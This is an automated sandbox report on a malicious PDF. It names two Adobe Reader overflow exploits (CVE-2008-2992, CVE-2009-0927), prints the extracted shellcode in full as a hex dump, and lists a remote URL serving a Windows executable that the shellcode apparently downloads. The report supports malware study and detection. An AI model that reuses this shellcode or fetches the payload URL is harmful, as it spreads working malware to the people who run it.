Analysis report for 666.pdf

Sample Overview

File666.pdf
MD58b1a51743f4579cb8a338215acae5318
Analysis Started2009-07-22 09:47:38
Report Generated2009-07-22 09:47:45
Jsand version1.03.02

Detection results

DetectorResult
Jsand 1.03.02malicious

Exploits

NameDescriptionReference
Adobe util.printf overflowStack-based buffer overflow in Adobe Acrobat and Reader via crafted format string argument in util.printfCVE-2008-2992
Adobe getIconStack-based buffer overflow in Adobe Reader and Acrobat via the getIcon method of a Collab objectCVE-2009-0927

Deobfuscation results

Evals

Writes

No writes.

Network Activity

Requests

URL
file://666.pdf

ActiveX controls

Shellcode and Malware

HexadecimalASCII
0a 0a 0a 0a 0a 0a 0a 0a  0a 0a 0a 0a 0a 0a d9 e1 
d9 34 24 58 58 58 58 33  db b3 1c 03 c3 31 c9 66 
81 e9 65 fa 80 30 21 40  e2 fa c9 17 22 21 21 49 
21 01 21 21 4b 21 de f1  98 21 31 21 21 aa d9 ca 
24 7f d2 85 de f1 c9 d7  de de de c9 1c 22 21 21 
aa d9 c9 19 21 21 21 c9  6c 20 21 21 c9 67 21 21 
21 c9 fa 22 21 21 aa d9  c9 03 21 21 21 c9 65 20 
21 21 c9 11 21 21 21 c9  a8 22 21 21 aa d9 c9 2d 
21 21 21 c9 40 20 21 21  c9 3b 21 21 21 ca 79 72 
aa fd 72 4b 61 49 21 31  21 21 76 c9 90 23 21 21 
c9 c4 21 21 21 79 e2 72  aa fd 72 4b 01 49 21 31 
21 21 76 c9 b8 23 21 21  c9 ec 21 21 21 79 e2 76 
c9 1d 25 21 21 aa d9 12  e8 68 12 e1 91 e2 dd d3 
8f ac 66 de 7e e2 7a 1f  e7 26 99 1f a8 7e 20 47 
1f e6 66 24 de c1 e2 c8  b4 25 21 21 7a a0 cd 35 
20 21 21 aa f5 1f e6 23  42 4c 45 01 1f e6 63 25 
0e 42 01 03 a2 e3 29 12  e1 71 71 49 25 20 21 21 
73 72 71 c9 e0 22 21 21  de f1 aa dd aa e6 a2 e1 
29 1f ab 39 a5 fa 55 22  61 ca d7 1f e7 21 03 12 
f3 1f a9 71 20 a2 cd 75  12 e1 12 fa aa ed a2 d9 
75 5c 28 1f a8 3d 20 a2  e1 25 ca d3 aa ed aa f8 
a2 e2 31 12 e1 1f e6 62  0d 20 21 21 21 70 72 71 
71 71 71 71 71 76 71 c9  18 22 21 21 c9 38 21 21 
21 45 80 25 21 21 21 ac  81 41 de de de c9 16 22 
21 21 12 fa 72 72 72 72  de f1 a1 19 c9 a1 19 c8 
54 2e a0 59 24 b1 b1 b1  b1 55 27 74 aa cd ac 61 
24 de c1 c9 0f de de de  e2 c9 09 de de de 99 30 
20 25 a1 e3 2d 21 c9 3a  de de de 12 e1 71 75 c9 
75 21 21 21 71 c9 aa 23  21 21 de f1 17 a1 1d 05 
21 56 2b c9 60 23 21 21  12 de 76 de f1 c9 da 20 
21 21 49 de 21 21 21 de  f1 c9 c9 df de de 72 76 
77 12 e1 71 75 c9 3f 21  21 21 71 c9 74 23 21 21 
de f1 17 a1 1d 05 21 56  2b c9 2a 23 21 21 12 de 
76 de f1 79 7f 7e 7a e2  ca 23 79 e2 c9 d8 de de 
de 77 76 a2 cd 29 aa dd  4b 29 76 1f de 56 35 c9 
7c 23 21 21 de f1 aa dd  49 40 4c 44 21 49 68 64 
67 53 aa d5 98 29 21 21  21 d2 87 54 0e 4b 21 1f 
de 55 05 01 c9 05 23 21  21 de f1 aa d9 c9 ea 20 
21 21 de f1 1a d9 55 29  17 aa 65 05 01 1f de 21 
1f de 55 05 3d c9 ce 20  21 21 de f1 a2 e5 31 7e 
7f 99 20 21 21 21 e2 49  4e 4f 21 21 49 54 53 4d 
4c ca 34 ac 65 05 25 71  c9 03 df de de 71 c9 6b 
23 21 21 c8 c3 df de de  c9 c7 de de de a2 e5 29 
e2 4b 4d 49 4f 55 45 4d  ca 34 ac 65 05 25 71 c9 
da dc de de 71 c9 02 23  21 21 c8 9a df de de c9 
c7 de de de a2 e5 29 e2  49 12 13 21 21 49 54 52 
44 53 ca 34 ac 65 05 25  71 c9 f0 dc de de 71 c9 
d8 20 21 21 c8 b0 df de  de c9 c7 de de de a2 e5 
29 e2 49 42 57 56 21 49  52 49 45 4e ca 34 ac 65 
05 25 71 c9 86 dc de de  71 c9 ee 20 21 21 c8 46 
df de de c9 c7 de de de  a2 e5 29 e2 49 57 46 59 
21 ca 34 ac 65 05 25 71  c9 a3 dc de de 71 c9 8b 
20 21 21 c8 63 df de de  c9 c7 de de de a2 e5 25 
e2 c9 8a 20 21 21 49 3a  e7 67 58 71 c9 e7 20 21 
21 a2 e5 29 e2 c9 b6 20  21 21 49 cd b6 22 2d 71 
c9 93 20 21 21 a2 e5 29  e2 c9 a2 20 21 21 49 8b 
dd 2c 5d 71 c9 bf 20 21  21 a2 e5 29 e2 c9 4e 20 
21 21 49 cc 77 ce 17 71  c9 ab 20 21 21 a2 e5 29 
e2 c9 7a 20 21 21 49 d1  ab 25 7e 71 c9 57 20 21 
21 a2 e5 29 e2 c9 d6 df  de de 49 59 49 fa 3d 71 
c9 43 20 21 21 a2 e5 29  e2 c9 12 20 21 21 49 ce 
ef c1 41 71 c9 6f 20 21  21 a2 e5 29 e2 c9 3e 20 
21 21 49 91 68 0c fa 71  c9 1b 20 21 21 a2 e5 29 
e2 c9 17 de de de 49 8a  7f ba 3f 71 c9 07 20 21 
21 a2 e5 29 e2 c9 86 df  de de 49 78 b6 a0 23 71 
c9 33 20 21 21 a2 e5 29  e2 c9 c2 21 21 21 49 5f 
f9 c3 52 71 c9 df 21 21  21 a2 e5 29 e2 c9 ee 21 
21 21 49 bf d8 9a 14 71  c9 cb 21 21 21 a2 e5 29 
e2 c9 b3 df de de 49 76  81 94 9a 71 c9 f7 21 21 
21 a2 e5 29 e2 c9 5f df  de de 49 3b 5b 3f 23 71 
c9 e3 21 21 21 a2 e5 29  e2 c9 4b df de de 49 c1 
7a 11 b5 71 c9 8f 21 21  21 a2 e5 29 e2 c9 77 df 
de de 49 b6 e8 c3 82 71  c9 bb 21 21 21 a2 e5 29 
e2 c9 63 df de de 49 49  05 e4 92 71 c9 a7 21 21 
21 a2 e5 29 e2 c9 76 21  21 21 49 53 df 92 37 71 
c9 53 21 21 21 a2 e5 29  e2 c9 65 df de de ca 32 
4b 44 71 c9 d6 da de de  71 c9 8a df de de c8 96 
dd de de c9 c9 de de de  e2 c9 88 dc de de 49 6e 
ce 6e 24 71 c9 1f 21 21  21 a2 e5 29 e2 c9 2e 21 
21 21 49 af 6f 2f cd 71  c9 0b 21 21 21 a2 e5 29 
e2 12 e1 45 aa 61 11 a4  e1 59 31 1f aa 61 2d 1f 
aa 51 3d 8c 1f aa 61 29  e2 ca 2a 1f aa 61 15 a2 
e1 5d 1f aa 61 1d e2 41  17 aa 4d 05 05 17 aa 64 
1d 17 aa 75 24 59 22 f4  1f aa 6b 39 1f aa 7b 01 
22 fc c2 1a 68 1f aa 15  aa 22 d4 12 de 12 e1 dd 
8d a5 e1 55 26 e0 ee 2c  22 d9 ca d5 17 1a 5d 05 
09 54 fe 1f aa 7b 05 22  fc 47 1f aa 2d 6a 1f aa 
7b 3d 22 fc 1f aa 25 aa  22 e4 17 a8 65 05 3d 40 
e2 c9 47 da de de 49 55  55 51 1b 0e 0e 52 4a 53 
40 4f 55 44 4f 0f 42 4e  4c 0e 51 48 42 0e 54 5b 
51 0f 51 49 51 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 21 21 21  21 21 21 21 21 21 21 21 
21 21 21 21 21 00 
................
.4$XXXX3.....1.f
..e..0!@...."!!I
!.!!K!...!1!!...
$............"!!
....!!!.l !!.g!!
!.."!!....!!!.e 
!!..!!!.."!!...-
!!!.@ !!.;!!!.yr
..rKaI!1!!v..#!!
..!!!y.r..rK.I!1
!!v..#!!..!!!y.v
..%!!....h......
..f.~.z..&...~ G
..f$.....%!!z..5
 !!....#BLE...c%
.B....)..qqI% !!
srq.."!!........
)..9..U"a....!..
...q ..u........
u\(..= ..%......
..1....b. !!!prq
qqqqqvq.."!!.8!!
!E.%!!!..A....."
!!..rrrr........
T..Y$....U't...a
$..............0
 %..-!.:.....qu.
u!!!q..#!!......
!V+.`#!!..v.... 
!!I.!!!.......rv
w..qu.?!!!q.t#!!
......!V+.*#!!..
v..y.~z..#y.....
.wv..)..K)v..V5.
|#!!....I@LD!Ihd
gS...)!!!..T.K!.
.U....#!!...... 
!!....U)..e....!
..U.=.. !!....1~
.. !!!.INO!!ITSM
L.4.e.%q.....q.k
#!!............)
.KMIOUEM.4.e.%q.
....q..#!!......
......).I..!!ITR
DS.4.e.%q.....q.
. !!............
).IBWV!IRIEN.4.e
.%q.....q.. !!.F
..........).IWFY
!.4.e.%q.....q..
 !!.c..........%
... !!I:.gXq.. !
!..)... !!I.."-q
.. !!..)... !!I.
.,]q.. !!..)..N 
!!I.w..q.. !!..)
..z !!I..%~q.W !
!..)......IYI.=q
.C !!..)... !!I.
..Aq.o !!..)..> 
!!I.h..q.. !!..)
......I...?q.. !
!..)......Ix..#q
.3 !!..)...!!!I_
..Rq..!!!..)...!
!!I....q..!!!..)
......Iv...q..!!
!..).._...I;[?#q
..!!!..)..K...I.
z..q..!!!..)..w.
..I....q..!!!..)
..c...II...q..!!
!..)..v!!!IS..7q
.S!!!..)..e....2
KDq.....q.......
..............In
.n$q..!!!..)...!
!!I.o/.q..!!!..)
...E.a...Y1..a-.
.Q=...a)..*..a..
.]..a..A..M....d
...u$Y"...k9..{.
"...h...."......
...U&..,".....].
.T...{.".G..-j..
{="...%."...e.=@
..G...IUUQ...RJS
@OUDO.BNL.QHB.T[
Q.QIQ!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!
!!!!!.

Additional (potential) malware:

URLTypeHashAnalysis
http://skranten.com/pic/uzp.php MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit ce03c95ab093fa038c0224a3e6187a65